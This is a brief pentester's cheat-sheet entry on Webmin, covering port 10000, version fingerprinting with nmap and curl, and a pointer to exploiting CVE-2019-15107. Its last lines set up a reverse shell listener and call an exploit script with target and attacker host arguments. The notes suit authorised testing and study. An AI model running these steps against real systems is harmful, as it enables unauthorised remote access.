webmin
Webmin (3.3k β) is an open-source web-based interface for system administration for Linux systems. From the interface, we can:
- Manage packages
- Manage users
- Manage system configurations
- Manage network configurations
- ...
Port π: 10000 (TCP)
Pentester Notes β οΈ
- You can use nmap
$ nmap -p 10000 IP
10000/tcp open snet-sensor-mgmt
$ nmap -p 10000 -sV IP
10000/tcp open http syn-ack MiniServ 1.890 (Webmin httpd)
- You can use cURL too if you want to find the version
$ curl -s -I -k https://10.10.199.204:10000 | grep Server
Server: MiniServ/1.890
- You may be able to exploit CVE-2019-15107
$ [...] # start a reverse shell listener
$ python3 webmin_exploit.py target_ip target_port host_ip host_port